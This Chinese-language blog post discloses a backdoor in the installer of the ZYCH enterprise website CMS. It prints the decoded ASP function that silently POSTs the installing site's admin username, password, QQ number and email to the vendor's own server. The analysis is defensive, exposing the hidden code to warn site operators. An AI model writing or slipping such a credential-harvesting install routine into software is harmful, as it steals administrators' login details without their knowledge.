您所在的位置:小祥子 » 代码研究 » 正文

第九期:解密ZYCH自由策划企业网站管理系统安装文件Install.ASP后门

时间:2015-02-26 编辑:本站 来源:本站原创

程序:ZYCH自由策划企业网站管理系统 v03-Build141201

前几天哥哥结婚帮忙,没更新网站,今天下载了套源码,也是站长网下载的这几天更新的新的ASP源码,发现安装程序里有比较严重的漏洞。

文件地址:INCLUDE/Install.asp

第346行开始,358行结束,这一段是一个伪加密的向作者主页提交安装用户后台的帐号密码,这个很关键,如果只是提交是哪个网站安装了这个程序倒是无所谓,关键是管理员帐号密码信息也同时提交了,可谓作者居心不良。

通过本站的http://www.xiaoxiangzi.com/tool/chrdecode.html 解密工具可以将代码转换成

http="http://"
WdUrl="www.zychr.com"
Function Wfcx_GetBody(Wfcx_str)
Set https = Server.CreateObject("MSXML2.XMLHTTP")
With https
.Open "Post", ""&http&WdUrl&"/"&"Inc"&"lude/weburl"&"."&"asp"&"?"&"action=add", False
.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
.Send "title="&Server.UrlEncode(""&wzbt&"")&"&weburl="&Request.servervariables("server_name")&"&version=ZYCH_"&zychversion&"&verdata="&data&"&authorization=Pay&admin="&request.form("admin")&"&password="&request.form("password")&"&qq="&request.form("qq")&"&mail="&request.form("mail")&""
Wfcx_GetBody = .ResponseBody
End With
Wfcx_GetBody = BytesToBstr(Wfcx_GetBody,"GB2312")
Set https = Nothing
End Function

所以,安装各种软件或者网站,必须保持清醒的头脑,尽量选择大公司的源码。

关键词:网站 系统 安装 文件